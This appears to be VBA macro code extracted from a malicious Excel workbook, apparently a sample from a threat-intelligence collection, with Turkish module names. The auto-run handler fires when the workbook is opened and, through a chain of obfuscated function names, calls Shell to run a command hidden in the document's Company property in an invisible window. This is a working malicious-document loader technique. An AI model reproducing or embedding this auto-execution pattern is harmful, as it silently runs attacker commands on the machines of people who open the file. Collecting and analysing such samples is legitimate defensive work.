Attribute VB_Name = "Bu|fffd|alismaKitabi"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Sub WorKbOOk_OPen(): Call wdacw: End Sub
Static Function wdacw() As Byte
Call dydqz
End Function
Static Sub dydqz()
Call reknq
End Sub
Static Sub reknq()
Call VBA.Shell$(ActiveWorkbook.BuiltinDocumentProperties("CoMPaNy").Value, 0)
End Sub
Attribute VB_Name = "Sayfa1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


INQUEST-PP=macro
